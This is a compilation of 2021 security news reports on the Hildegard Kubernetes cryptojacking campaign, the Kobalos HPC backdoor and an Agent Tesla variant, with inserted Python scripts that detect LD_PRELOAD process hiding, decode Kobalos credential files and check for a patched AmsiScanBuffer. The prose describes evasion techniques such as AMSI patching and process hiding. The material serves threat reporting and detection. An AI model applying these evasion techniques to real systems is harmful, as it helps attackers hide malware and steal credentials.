The campaign employs tools and domains observed in previous TeamTNT attacks, but the code base and infrastructure appear incomplete, suggesting that the campaign is still under development. Most of the infrastructure is only one month old and some scripts are being frequently updated.

“Knowing this malware’s capabilities and target environments, we have good reason to believe that the group will soon launch a larger-scale attack,” Palo Alto Networks’ researchers say.

In addition to abusing the processing power of Kubernetes clusters for cryptojacking, the malware might also be leveraged for the exfiltration of sensitive data from the applications running in the targeted environments.

Leveraging the reverse shell, the attackers can also manually perform additional reconnaissance and operations.

The Hildegard malware gathers various types of information on the host and also searches for credentials on the host, including cloud access keys and tokens, SSH keys, Docker credentials, and Kubernetes service tokens. All credentials files discovered are sent to the C&C.

“This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C&C,” Palo Alto Networks concludes.

In an emailed comment to SecurityWeek, Tal Morgenstern, co-founder and CPO at vulnerability management firm Vulcan Cyber, pointed out the importance of ensuring that all assets are properly secured, given the nature of this attack.

“In this complex attack, threat actors are leveraging a combination of Kubernetes misconfigurations and known vulnerabilities. DevOps and IT teams must closely coordinate with their counterparts in security to prioritize remediation especially for external-facing assets and high-risk vulnerabilities. It is very possible to quickly secure Kubernetes. The remedies are available, but it takes work, focus and cross-team collaboration to get fixes done and prevent these kinds of attacks,” Morgenstern said.


New Malware Hijacks Kubernetes Clusters to Mine Monero

4.2.2021  Virus  Threatpost
Researchers warn that the Hildegard malware is part of ‘one of the most complicated attacks targeting Kubernetes.’

Researchers have discovered never-before-seen malware, dubbed Hildegard, that is being used by the TeamTNT threat group to target Kubernetes clusters.

While Hildegard, initially detected in January 2021, is currently being used to launch cryptojacking operations, researchers believe that the campaign may still be in the reconnaissance and weaponization stage. Eventually, they warn, TeamTNT may launch a larger-scale cryptojacking attack via Kubernetes environments or steal data from applications running in Kubernetes clusters.

“We believe that this new malware campaign is still under development due to its seemingly incomplete codebase and infrastructure,” said Jay Chen, Aviv Sasson and Ariel Zelivansky, researchers with Palo Alto Networks, on Wednesday. “At the time of writing, most of Hildegard’s infrastructure has been only online for a month.”

The Campaign
Attackers first gained initial access by targeting a misconfigured kubelet with a remote code execution attack that gave them anonymous access.

The kubelet maintains a set of pods on a local system; within a Kubernetes cluster, the kubelet functions as a local agent that watches for pod specs via the Kubernetes API server.

Once they had a foothold in a Kubernetes cluster in this way, the attackers downloaded tmate and issued a command to run it in order to establish a reverse shell to tmate.io. Tmate is a software application that provides a secure terminal sharing solution over an SSH connection.

The attack process. Credit: Palo Alto Networks

Then the attacker used the masscan Internet port scanner to scan the Kubernetes cluster’s internal network and find other unsecured kubelets. They then attempted to deploy a malicious cryptomining script (xmr.sh) to containers managed by these kubelets. Researchers said that from these cryptojacking operations, attackers have collected 11 XMR (~$1,500) in their wallet.

TeamTNT has previously targeted unsecured Docker daemons in order to deploy malicious container images. Researchers noted that these Docker engines run on a single host. On the other hand, the Kubernetes clusters, which are the set of nodes that run containerized applications, typically contain more than one host – with every host running multiple containers.

This means that attackers can work with a more abundant set of resources in a Kubernetes infrastructure – meaning a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host, they said.

“The most significant impact of the malware is resource hijacking and denial of service (DoS),” said researchers. “The cryptojacking operation can quickly drain the entire system’s resources and disrupt every application in the cluster.”

Malware Capabilities
While the malware utilizes many of the same tools and domains identified in TeamTNT’s previous campaigns, it also harbors multiple new capabilities that make it more stealthy and persistent, said researchers.

For one, the malware relies on two disparate ways to establish command and control (C2) connections: the tmate reverse shell, as well as an Internet Relay Chat (IRC) channel.

“It is unclear how TeamTNT chooses and tasks between these two C2 channels, as both can serve the same purpose,” said researchers.

Hildegard also uses various detection evasion tactics that researchers have not previously associated with TeamTNT. For example, the malware mimics a known Linux process name (bioset) to disguise its malicious IRC communications.

It also uses a library injection technique based on LD_PRELOAD to hide its malicious processes: “The malware modified the /etc/ld.so.preload file to intercept shared libraries’ imported functions,” explained researchers. “This way, when applications try to identify the running processes (by reading files under /proc) in the containers, tmate, xmrig … will not be found.”

Finally, the malware encrypts its malicious payload inside a binary to make the automated static analysis more difficult.
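As an added defensive illustration (not code from Unit 42 or the report), the Python below checks a host for the two evasion tricks just described: it audits /etc/ld.so.preload, compares the readdir() view of /proc against a direct per-PID probe to surface hidden processes, and flags user-space processes that borrow a kernel-thread name such as bioset. The /proc look-alike it builds for offline testing is constructed.

```python
import os
import re
import tempfile

PID_RE = re.compile(r"^\d+$")
SYSTEM_LIB_PREFIXES = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")
# Names of genuine kernel threads that malware has borrowed (bioset per the report).
KERNEL_THREAD_NAMES = {"bioset", "kthreadd", "ksoftirqd", "kworker", "migration"}


def parse_ld_so_preload(text):
    """Library paths listed in ld.so.preload: one or more, whitespace-separated."""
    return text.split()


def classify_preload_entry(lib, exists=os.path.exists):
    """Reasons an ld.so.preload entry deserves a look. An empty list means
    nothing stood out, which is still unusual: most hosts have no preload file."""
    reasons = []
    if not os.path.isabs(lib):
        reasons.append("relative path")
    elif not lib.startswith(SYSTEM_LIB_PREFIXES):
        reasons.append("outside system library directories")
    if not exists(lib):
        reasons.append("file not visible (missing, or hidden by the hook)")
    return reasons


def pids_from_listing(proc_root="/proc"):
    """PIDs as readdir() reports them: the view ps/top use and the one a
    preloaded readdir() hook can filter."""
    return {int(n) for n in os.listdir(proc_root) if PID_RE.match(n)}


def pids_from_probe(proc_root="/proc", max_pid=None):
    """PIDs found by probing /proc/<pid>/status by number, which never calls
    readdir(). A hook that also intercepts stat()/open() defeats this too,
    so for a container the probe is best run from the host's PID namespace."""
    if max_pid is None:
        with open(os.path.join(proc_root, "sys", "kernel", "pid_max")) as f:
            max_pid = int(f.read())
    return {pid for pid in range(1, max_pid + 1)
            if os.path.exists(os.path.join(proc_root, str(pid), "status"))}


def hidden_pids(listed, probed):
    """PIDs that exist but are missing from the directory listing."""
    return sorted(probed - listed)


def is_fake_kernel_thread(comm, cmdline):
    """Real kernel threads have an empty /proc/<pid>/cmdline. A process with a
    kernel-thread name (bioset, kworker/0:1, ...) and a command line is
    user space in disguise."""
    base = comm.strip().split("/")[0]
    return base in KERNEL_THREAD_NAMES and len(cmdline) > 0


def scan_proc(proc_root="/proc", max_pid=None):
    """Run both checks; returns {'hidden': [...], 'fake_kernel_threads': [...]}."""
    listed = pids_from_listing(proc_root)
    probed = pids_from_probe(proc_root, max_pid)
    report = {"hidden": hidden_pids(listed, probed), "fake_kernel_threads": []}
    for pid in sorted(probed):
        base = os.path.join(proc_root, str(pid))
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read()
            with open(os.path.join(base, "cmdline"), "rb") as f:
                cmdline = f.read()
        except OSError:
            continue  # process exited between probe and read
        if is_fake_kernel_thread(comm, cmdline):
            report["fake_kernel_threads"].append((pid, comm.strip()))
    return report


def build_fake_proc(entries):
    """Constructed /proc look-alike for offline testing; entries maps
    pid -> (comm, cmdline bytes)."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    for pid, (comm, cmdline) in entries.items():
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        with open(os.path.join(d, "status"), "w") as f:
            f.write(f"Name:\t{comm}\nPid:\t{pid}\n")
        with open(os.path.join(d, "comm"), "w") as f:
            f.write(comm + "\n")
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(cmdline)
    return root


if __name__ == "__main__":
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as f:
            for lib in parse_ld_so_preload(f.read()):
                print("preload entry:", lib, classify_preload_entry(lib) or "(nothing unusual)")
    else:
        print("/etc/ld.so.preload is absent")
    result = scan_proc()
    print("PIDs hidden from readdir():", result["hidden"])
    print("user-space processes with kernel-thread names:", result["fake_kernel_threads"])
```

On a live host the probe walks every PID up to pid_max, which can take several seconds on systems with a large pid_max.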

TeamTNT
The new malware is only the latest change from the TeamTNT cybercrime group, which is known for cloud-based attacks, including targeting Amazon Web Services (AWS) credentials in order to break into the cloud and use it to mine for the Monero cryptocurrency.

Last week, researchers found that the group had added a new detection-evasion tool to its arsenal, helping its cryptomining malware skirt by defense teams. From time to time, TeamTNT has also been seen deploying various updates to its cryptomining malware. In August, TeamTNT’s cryptomining worm was discovered spreading through the AWS cloud and collecting credentials. Then, after a hiatus, the TeamTNT group returned in September to attack Docker and Kubernetes cloud instances by abusing a legitimate cloud-monitoring tool called Weave Scope.

Researchers noted that while the malware is still under development and the campaign is not yet widespread, they believe the attacker will soon mature its tools and start a large-scale deployment.

“This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes,” said researchers. “This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. These efforts make the malware more stealthy and persistent.”


A New Linux Malware Targeting High-Performance Computing Clusters
4.2.2021 
Virus  Thehackernews
High-performance computing clusters belonging to university networks as well as servers associated with government agencies, endpoint security vendors, and internet service providers have been targeted by a newly discovered backdoor that gives attackers the ability to execute arbitrary commands on the systems remotely.

Cybersecurity firm ESET named the malware "Kobalos" — a nod to a "mischievous creature" of the same name from Greek mythology — for its "tiny code size and many tricks."

"Kobalos is a generic backdoor in the sense that it contains broad commands that don't reveal the intent of the attackers," researchers Marc-Etienne M. Léveillé and Ignacio Sanmillan said in a Tuesday analysis. "In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers."

Besides tracing the malware back to attacks against a number of high-profile targets, ESET said the malware is capable of taking aim at Linux, FreeBSD, Solaris, and possibly AIX and Windows machines, with code references hinting at Windows 3.11 and Windows 95 legacy operating systems.

Kobalos infections are believed to have started in late 2019 and have since continued to remain active throughout 2020.

The initial compromise vector used to deploy the malware and the ultimate objective of the threat actor remain unclear, but the presence of a trojanized OpenSSH client on one of the compromised systems alludes to the possibility that "credential stealing could be one of the ways Kobalos propagates."

No other malware artifacts were found on the systems, nor has there been any evidence that could potentially reveal the attackers' intent.

"We have not found any clues to indicate whether they steal confidential information, pursue monetary gain, or are after something else," the researchers said.

But what they did uncover shows the multi-platform malware harbors some unusual techniques, including features that could turn any compromised server into a command-and-control (C&C) server for other hosts compromised by Kobalos.

In other words, infected machines can be used as proxies that connect to other compromised servers; the operators can then create new Kobalos samples that use this new C&C server, building a proxy chain of multiple infected servers to reach their targets.

To maintain stealth, Kobalos authenticates connections with infected machines using a 32-byte password that's generated and then encrypted with a 512-bit RSA private key. Subsequently, a pair of RC4 keys is used — one for inbound traffic and one for outbound traffic — for communications with the C&C server.

The backdoor also leverages a complex obfuscation mechanism to thwart forensic analysis by recursively calling the code to perform a wide range of subtasks.

"The numerous well-implemented features and the network evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems," the researchers said.

"Their targets, being quite high-profile, also show that the objective of the Kobalos operators isn't to compromise as many systems as possible. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our Internet-wide scan."


Tiny Kobalos Malware Bedevils Supercomputers to Steal Logins
3.2.2021 
Virus  Threatpost

The sophisticated backdoor steals SSH credentials for servers in academic and scientific high-performance computing clusters.

A tiny-sized malware that packs a big punch has been targeting supercomputers, especially those used in academia and scientific enterprises. It allows initial access for a variety of follow-on attacks, including credential theft – and potentially data exfiltration or cryptomining.

That’s according to ESET researchers, who discovered the Kobalos backdoor in recent months. The code grants remote access to the file system, allows attackers to create terminal sessions and allows proxying connections to other Kobalos-infected servers.

“Kobalos malware contains generic commands to read from and write to the file system and spawn a terminal to execute arbitrary commands,” they explained. “Unfortunately, it doesn’t contain any specific payload that could indicate the intentions of its authors. The operators likely open a shell through the terminal and perform whatever commands they need to.”

Kobalos, Mischievous Sprite
Kobalos gets its name from Greek mythology. The kobaloi were companions of Dionysus, a band of mischievous sprites known for tricking and frightening mortals. ESET researchers adopted the name for the malware “for its tiny code size and many tricks,” they said in an analysis issued Tuesday.

The backdoor is multiplatform and capable of attacking Linux, BSD, Solaris, and possibly AIX and Windows machines, researchers said (they found strings related to Windows 3.11 and Windows 95, which are 25-year-old operating systems).

So far it has mainly been seen going after high-performance computing (HPC) clusters, but it has also been seen infecting a large Asian ISP, a North American endpoint security vendor and a handful of personal servers.

ESET identified Kobalos victims by scanning for connections to SSH servers that use a specific TCP source port known to be abused by the malware.

“There are multiple ways for the operators to reach a Kobalos-infected machine,” according to ESET. “The method we’ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port.”

However, there are other standalone variants that are not embedded in sshd; these either connect to a command-and-control (C2) server that acts as a middleman, or wait for an inbound connection on a given TCP port, the firm noted.

Initial Compromise
ESET researchers are unsure how the infected systems were compromised to gain administrative access to install the Kobalos backdoor, but an obvious possible entry point could be exploitation of a known vulnerability.

“Some of the compromised machines ran old, unsupported or unpatched operating systems and software,” they explained. “While the use of an undisclosed vulnerability isn’t impossible, a known exploit is more likely in this situation.”

Kobalos is also likely spread using stolen credentials: on systems compromised by Kobalos, ESET observed that the SSH client in use had its credentials stolen by a second-stage malware. This SSH credential stealer took the form of a trojanized OpenSSH client.

“The /usr/bin/ssh file was replaced with a modified executable that recorded username, password and target hostname, and wrote them to an encrypted file,” ESET researchers explained. Those stolen credentials can simply be used by the attackers to install Kobalos on the newly discovered server later.

Thus, to avoid becoming a victim, administrators should make sure patches are up-to-date and they should set up two-factor authentication (2FA) for connecting to SSH servers, researchers noted: “Kobalos is another case where 2FA could have mitigated the threat, since the use of stolen credentials seems to be one of the ways it is able to propagate to different systems.”

A Self-Contained Malware Ecosystem
The C2 server approach in Kobalos is notable, according to the analysis, because the C2 code is embedded within the backdoor itself.

“Any server compromised by Kobalos can be turned into a C2 server by the operators sending a single command,” researchers explained. “As the C2 server IP addresses and ports are hardcoded into the executable, the operators can then generate new Kobalos samples that use this new C2 server.”

Kobalos can also be used as a proxy to connect to other infected servers.

Main Kobalos features. Source: ESET.

“It is not a generic TCP proxy; it expects communication to be encapsulated in packets specific to this threat. [Also] a command can be sent to the proxy to ‘switch’ the connection to a new TCP port. Proxies can be chained, which means the operators can use multiple Kobalos-compromised machines to reach their targets.”

Interestingly, the Kobalos code is tightly contained in a single function, which “recursively calls itself to perform subtasks,” according to the analysis.

This compact architecture combines with other malware attributes to defy analysis. For instance, ESET pointed out that Kobalos’ usage of an existing open port makes the threat harder to find. And, all strings are encrypted, “so it’s more difficult to find the malicious code than when looking at the samples statically,” the report noted.

To that end, using the backdoor requires a private 512-bit RSA key and a 32-byte-long password. Once both are validated, Kobalos generates and encrypts two 16-byte keys with the RSA-512 public key and sends them to the attackers. These two keys are used to RC4 encrypt subsequent inbound and outbound traffic.

Overall, the Kobalos authors are clearly advanced attackers, ESET surmised.

“Numerous well-implemented features and the network-evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems,” according to the report. “Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our internet-wide scan.”

SSH Client Credential Theft
The credential stealer mentioned earlier is unique, researchers said, and unlike any of the malicious OpenSSH clients the team has analyzed in the past.

Different variants were found, including Linux and FreeBSD instances. In all cases, the main capabilities consist of stealing hostname, port, username and password used to establish an SSH connection from the compromised host, which are saved in an encrypted file.

“All samples found use the same simple cipher for the contents of the files; it simply adds 123 to each byte of data to be saved,” researchers explained. “For the FreeBSD version, the same format and cipher is applied. However, there are some small implementation differences, such as encrypting the file path in the malware with a single-byte XOR.”

The location of the file where the stolen SSH credentials are saved varies depending on the variant, but all samples create a file under /var/run with a legitimate-looking “.pid” extension.
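Added here as a forensic illustration, not ESET's tooling: a Python triage helper that decodes the stealer's add-123 cipher and tells a genuine .pid file under /var/run apart from one holding encoded credential records. The record text used as sample input is constructed, since the report does not give the exact on-disk layout.

```python
import os
import string

KEY_ADD = 123                      # the "add 123 to each byte" cipher ESET describes
PRINTABLE = set(string.printable.encode())


def kobalos_decode(data):
    """Undo the stealer's cipher: subtract 123 from every byte (mod 256)."""
    return bytes((b - KEY_ADD) & 0xFF for b in data)


def kobalos_encode(data):
    """Inverse of kobalos_decode; used only to construct test material."""
    return bytes((b + KEY_ADD) & 0xFF for b in data)


def xor_single_byte(data, key):
    """The FreeBSD variant stores its output path XORed with one byte;
    XOR is its own inverse, so one call both encodes and decodes."""
    return bytes(b ^ key for b in data)


def printable_ratio(data):
    """Fraction of bytes that are printable ASCII (0.0 for empty input)."""
    if not data:
        return 0.0
    return sum(1 for b in data if b in PRINTABLE) / len(data)


def is_genuine_pid_file(data):
    """A real .pid file is a single decimal number, optionally newline-terminated."""
    return data.strip().isdigit()


def classify_pid_file(data):
    """'pid' for a real PID file, 'kobalos-credentials' when the bytes only
    turn into text after the 123-subtraction, otherwise 'unknown'."""
    if is_genuine_pid_file(data):
        return "pid"
    decoded = kobalos_decode(data)
    # Plaintext ASCII shifted by 123 lands in 0x9b..0xf9, so the raw file is
    # almost entirely non-printable while the decoded one is almost all text.
    if printable_ratio(data) < 0.5 and printable_ratio(decoded) > 0.95:
        return "kobalos-credentials"
    return "unknown"


def triage_directory(directory="/var/run"):
    """Classify every .pid file in the directory; returns {path: verdict}."""
    verdicts = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if name.endswith(".pid") and os.path.isfile(path):
            try:
                with open(path, "rb") as f:
                    verdicts[path] = classify_pid_file(f.read())
            except OSError:
                verdicts[path] = "unreadable"
    return verdicts


if __name__ == "__main__":
    for path, verdict in triage_directory().items():
        print(f"{verdict:20s} {path}")
        if verdict == "kobalos-credentials":
            with open(path, "rb") as f:
                print(kobalos_decode(f.read()).decode("ascii", "replace"))
```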

Newer versions of the credential-stealer contain an encrypted configuration and add the functionality to exfiltrate credentials over UDP to a remote host specified in the configuration.

“Exfiltrating credentials over UDP is something Ebury and other SSH credential stealers such as Bonadan, Kessel and Chandrila have been doing,” the analysis read. “The choice of UDP could be to bypass a firewall and avoid creating TCP network flow to potentially untrusted hosts.”

The malware’s configuration includes the hostname of the victim and a specified file path for exfiltration, so that the cyberattackers can track the origin of the credentials. “This also means that each compromised server receives a unique sample of the credential stealer,” researchers added.

Interestingly, the code lacks the sophistication of Kobalos itself, according to ESET.

“For example, strings were left unencrypted, and stolen usernames and passwords are simply written to a file on disk,” researchers wrote. “However, we found newer variants that contain some obfuscation and the ability to exfiltrate credentials over the network.”

Supercomputer Cyberattacks
Attacks on HPCs have become more common in the last 12 months.

An advisory from the European Grid Infrastructure (EGI) CSIRT last year warned that supercomputing clusters in Canada, China and Poland had been compromised to deploy cryptocurrency miners.

Meanwhile, the U.K. supercomputer known as ARCHER was compromised in May last year to steal SSH credentials.

It’s unclear if Kobalos was working its mischief in these attacks; the CERN Computer Security Team responsible for mitigating attacks on scientific research networks did say that Kobalos’ existence predates the incidents, but ESET found that the techniques described in the cryptomining attacks in particular were different from the Kobalos efforts.

Nonetheless, Kobalos has a clear interest in supercomputing, and these high-profile targets show that the objective of the Kobalos operators isn’t to compromise as many systems as possible, researchers noted.

“It is not clear why the HPC community is overly represented among the victims of these attacks,” according to the report. “HPC centers are obviously interesting targets but typically less easily accessible than other academic servers.”

That said, “CERN and other incident response teams [have] observed a number of legacy designs and suboptimal security practices that played a key role in enabling the attackers to spread their attacks. Additionally, most HPC victims were poorly prepared for forensics, in particular with regard to traceability.”

The credential-stealing aspect of Kobalos could also explain why many academic networks were compromised, they added: “If one of those system’s SSH clients was used by students or researchers from multiple universities, it could have leaked credentials to all these third-party systems.”


Agent Tesla Trojan ‘Kneecaps’ Microsoft’s Anti-Malware Interface
3.2.2021 
Virus  Threatpost

A new version of the Agent Tesla RAT can ‘kneecap’ endpoint protection software supported by Microsoft AMSI.

Researchers have identified new versions of the Agent Tesla remote access trojan (RAT) that target the Windows anti-malware interface used by security vendors to protect PCs from attacks. The newly discovered variants have also adopted new obfuscation capabilities, raising the stakes for businesses to fend off the ever-evolving Agent Tesla malware.

Chief among the updates is that the malware now targets Microsoft’s Antimalware Scan Interface (AMSI) in order to avoid detection. AMSI allows applications and services to integrate with any antimalware product that’s present on a machine. The malware also now has the added capability of deploying a Tor client to conceal its communications, as well as using the Telegram chat application to exfiltrate data.

All of these changes make sandbox analysis, static analysis and endpoint detection of the malware more difficult, warned researchers.

“Agent Tesla remains a consistent threat—for many months, it has remained among the top families of malware in malicious attachments caught by Sophos,” said Sophos researchers on Tuesday. “Because of this sustained stream of Agent Tesla attacks, we believe that the malware will continue to be updated and modified by its developers to evade endpoint and email protection tools.”

Agent Tesla first came onto the scene in 2014, specializing in keylogging (recording the keystrokes made by a user in order to exfiltrate data such as credentials) and data-stealing. Agent Tesla has historically arrived as an attachment to a malicious spam email.

The first stage of the malware’s newer version includes a .NET-based downloader. The downloader collects obfuscated code from websites like Pastebin and Hastebin (which touts itself as an “open source alternative to Pastebin”). This is not a new tactic, with Agent Tesla previously turning to a legitimate Pastebin-like web service for downloading malware.

Agent Tesla. Credit: Sophos

Then, Agent Tesla’s installer attempts to overwrite code in Microsoft’s AMSI. First, the downloader attempts to get the memory address of AmsiScanBuffer (the Microsoft function, declared in amsi.h, that scans a buffer of content for malware).

It does so by loading amsi.dll with the Windows LoadLibraryA function to obtain the DLL’s base address, then passing that base address and the procedure name “AmsiScanBuffer” to GetProcAddress to obtain the address of the function.

Once Agent Tesla gets the address of AmsiScanBuffer, it patches the first 8 bytes of the function in memory. This forces AMSI to return an error (code 0x80070057), making all the AMSI scans of memory appear to be invalid, according to researchers.

“This kneecaps AMSI-enabled endpoint protection software, by essentially making them skip further AMSI scans for dynamically loaded assemblies within the Agent Tesla process,” said researchers. “Since this happens early in the first stage downloader’s execution, it renders any AMSI protection against the subsequent components of the downloader, the second-stage loader, and the Agent Tesla payload itself.”
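To show what a defender can check for, here is an added Python example (not Sophos' code) that reads the live prologue of AmsiScanBuffer in its own process and reports whether it has been replaced by an immediate return. The byte shapes it recognises are an assumption about what such a patch looks like, since the report does not list the exact bytes written, and the sample prologues in the test are constructed.

```python
import ctypes
import sys

E_INVALIDARG = 0x80070057   # the HRESULT the patched function is forced to return


def classify_prologue(code):
    """Classify the first 8 bytes of a function.

    A normal exported function starts with a real prologue (register saves,
    stack adjustment). A patch that "kneecaps" the function instead makes it
    return at once, which on x86/x64 leaves one of these shapes (assumed here):
      C3              RET                  -> "patched-ret"
      B8 imm32 C3     MOV EAX, imm32; RET  -> "patched-mov-ret:0x<imm>"
    Anything else is reported as "intact", meaning no immediate return.
    """
    if len(code) < 8:
        raise ValueError("need at least 8 bytes of the function")
    if code[0] == 0xC3:
        return "patched-ret"
    if code[0] == 0xB8 and code[5] == 0xC3:
        imm = int.from_bytes(code[1:5], "little")
        return f"patched-mov-ret:0x{imm:08X}"
    return "intact"


def forced_hresult(verdict):
    """HRESULT a MOV/RET patch forces the function to return, or None."""
    if verdict.startswith("patched-mov-ret:"):
        return int(verdict.split(":", 1)[1], 16)
    return None


def read_amsi_scan_buffer_prologue(n=8):
    """Read the live first bytes of amsi!AmsiScanBuffer in this process.

    Windows only. The export is resolved the same way the loader in the
    article does (LoadLibrary, then GetProcAddress), but memory is only read."""
    if sys.platform != "win32":
        raise OSError("amsi.dll only exists on Windows")
    amsi = ctypes.WinDLL("amsi.dll")                # LoadLibrary
    func = amsi.AmsiScanBuffer                       # GetProcAddress
    addr = ctypes.cast(func, ctypes.c_void_p).value
    return ctypes.string_at(addr, n)


def check_amsi():
    """Return (verdict, forced HRESULT or None, raw prologue hex)."""
    code = read_amsi_scan_buffer_prologue()
    verdict = classify_prologue(code)
    return verdict, forced_hresult(verdict), code.hex()


if __name__ == "__main__":
    verdict, hresult, raw = check_amsi()
    print(f"AmsiScanBuffer begins with {raw}: {verdict}")
    if hresult == E_INVALIDARG:
        print("function is forced to return E_INVALIDARG (0x80070057): AMSI is kneecapped")
```

Run it inside a process you suspect (for instance from a PowerShell host that loads AMSI) rather than a fresh interpreter, since the patch lives only in the memory of the process that applied it.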

The new version of Agent Tesla also has the added capabilities of deploying a Tor client. This free, open-source software enables anonymous communication – serving as a tool for Agent Tesla to conceal its communications, said researchers.

“If selected in the configuration file, the malware downloads and installs a Tor client from the official Tor site,” said researchers. “If the Tor client is already present, it kills the process before installing the new one, and writes a torrc configuration file from encrypted strings hardcoded into the malware.”

New Features
Researchers said the functionality of these two new variants is largely the same, but they now include updates to the data that is captured and to how it is exfiltrated.

In the new Agent Tesla version, the developers can now capture data from the Windows clipboard. The Windows clipboard is a storage area for items that have been cut or copied; this data could include anything from sensitive text copied from emails or documents to passwords. This data is then sent back to the command-and-control (C2) server.

Another difference is that in the new version of Agent Tesla, the number of applications targeted for credential harvesting “has been expanded considerably.”

Agent Tesla previously targeted credentials from applications like Apple Safari, Chromium, Google Chrome, Iridium, Microsoft IE and Edge, Mozilla Firefox, Mozilla Thunderbird, OpenVPN, Opera, Opera Mail, Qualcomm Eudora, Tencent QQBrowser and Yandex. The malware also now targets FTPNavigator (a Windows-based Internet application that facilitates FTP transfers), WinVNC4 (a remote desktop control allowing users to control computers remotely), WinSCP (which provides secure file transfer between a local and a remote computer) and SmartFTP (a network file transfer program for Microsoft Windows).

“The credential-stealing function also includes code which launches a separate thread to exfiltrate browser cookies. While this code is present in all the samples of Agent Tesla from both v2 and v3, it isn’t always used,” said researchers. “Also, this feature is not set from the configuration file—so, perhaps, it’s a premium feature attackers must buy from Agent Tesla’s developer.”

While Agent Tesla has previously communicated with the C2 server over HTTP, SMTP (simple mail transfer protocol) and FTP (file transfer protocol), the new version also uses Telegram to exfiltrate data, by sending the stolen data to a private Telegram chat room.

Agent Tesla: A Seven-Year Threat
While the Windows-targeting Agent Tesla remote access trojan (RAT) has been active for over seven years, researchers said that they have continued to see new variants of the malware in a growing number of attacks over the past 10 months, compared with the infamous TrickBot or Emotet malware, for instance.

In fact, in December 2020, Agent Tesla accounted for 20 percent of malware email attachments detected in researchers’ telemetry.

Moving forward, researchers said they believe Agent Tesla will continue to evolve.

“The differences between the two demonstrate how the RAT has evolved, employing multiple types of defense evasion and obfuscation to avoid detection,” they said.


Kobalos, a complex Linux malware targets high-performance computing clusters
3.2.2021 
Virus  Securityaffairs

ESET experts uncovered a previously undocumented piece of malware that had been observed targeting high-performance computing clusters (HPC).
ESET analyzed a new piece of malware, dubbed Kobalos, that was employed in attacks against high-performance computing clusters (HPC).

The name Kobalos comes from a small sprite from Greek mythology, a mischievous creature fond of tricking and frightening mortals.

Kobalos is a small Linux malware, only 25 KB for x86-64 samples, that also works on FreeBSD and Solaris, and possibly on Windows and AIX systems as well.

Evidence of the malware activity was first spotted in late 2019, but the threat actors behind the malware remained active throughout 2020.

“Kobalos is a generic backdoor in the sense that it contains broad commands that don’t reveal the intent of the attackers.” reads the analysis published by ESET. “In short, Kobalos grants remote access to the file system, provides the ability to spawn terminal sessions, and allows proxying connections to other Kobalos-infected servers.”

The researchers were not able to determine the intent of the attackers behind the malware, nor to link the threat to previously reported infections.

The experts pointed out that Kobalos has not been used to abuse infected supercomputers for cryptocurrency mining.
Experts noticed that a Kobalos infection can be identified by connecting to the SSH server from a specific TCP source port; using that knowledge, they were able to scan the internet to find potential victims.

The list of systems targeted by Kobalos included high-performance computing clusters (HPC), an endpoint security solutions provider, government agencies, and personal servers in North America, universities, hosting firms in Europe, and a major ISP in Asia.

Kobalos stands out for including the C&C code within itself, a design choice that allows operators to turn any compromised server into a C&C.
ESET researchers also noticed that attackers deployed on the infected systems a tool designed to steal credentials from SSH clients. The tool is a trojanized OpenSSH client; attackers likely used it to steal SSH credentials and use them to spread to other servers within the target organization.

The level of sophistication of the Kobalos malware is rarely seen in Linux malware; for this reason, experts believe it may have been around for a while and will be continuously improved.
“The numerous well-implemented features and the network evasion techniques show the attackers behind Kobalos are much more knowledgeable than the typical malware author targeting Linux and other non-Windows systems,” concludes ESET. “Their targets, being quite high profile, also show that the objective of the Kobalos operators isn’t to compromise as many systems as possible. Its small footprint and network evasion techniques may explain why it went undetected until we approached victims with the results of our internet-wide scan.”


Sophisticated Multiplatform Malware 'Kobalos' Targets Supercomputers
3.2.2021 
Virus  Securityweek

Cybersecurity firm ESET on Tuesday published a report detailing what it described as a previously undocumented piece of malware that had been observed targeting high-performance computing (HPC) clusters.

ESET has named this piece of malware Kobalos due to its small size (x86-64 samples are only 25 Kb) and its many tricks — Kobalos is a mischievous creature from Greek mythology. While the company’s analysis focuses on the Linux version of the malware, researchers say Kobalos also works on FreeBSD and Solaris, and possibly on Windows and AIX systems as well.

ESET says it hasn’t been able to determine the goals of the Kobalos operators, particularly since it could only obtain the malware itself and not any network traffic generated by an attack. However, the company hopes that its report could help others further analyze the threat.

The first known victim of Kobalos was spotted in late 2019 and ESET said the group operating the malware had remained active throughout 2020. However, the analyzed code also contained strings related to very old Microsoft operating systems, specifically Windows 3.11 and Windows 95.

Threat actors targeting supercomputers — often for cryptocurrency mining — is not unheard of, but the cybersecurity company’s researchers have not found any links between Kobalos and previously reported incidents. Kobalos has not been seen attempting to abuse compromised supercomputers for cryptocurrency mining.

Moreover, Kobalos has been observed targeting other types of entities as well. ESET says victims include an endpoint security solutions provider, government agencies, and personal servers in North America; universities, HPC infrastructure, a marketing agency, and hosting firms in Europe; and a major ISP in Asia.

Researchers have described Kobalos as a “generic backdoor” that can allow its operators to perform a wide range of tasks, including gaining remote access to the compromised device’s file system, spawning a shell and executing arbitrary commands, and using the infected device as a proxy. Kobalos stands out for having the C&C code within itself, which allows its operators to turn any compromised server into a C&C.


According to ESET, the attackers have also delivered a tool designed to steal credentials from SSH clients on devices infected with Kobalos — this stealer is actually a trojanized OpenSSH client. Researchers believe the threat actors may be using the stolen SSH credentials to help Kobalos spread to other servers.

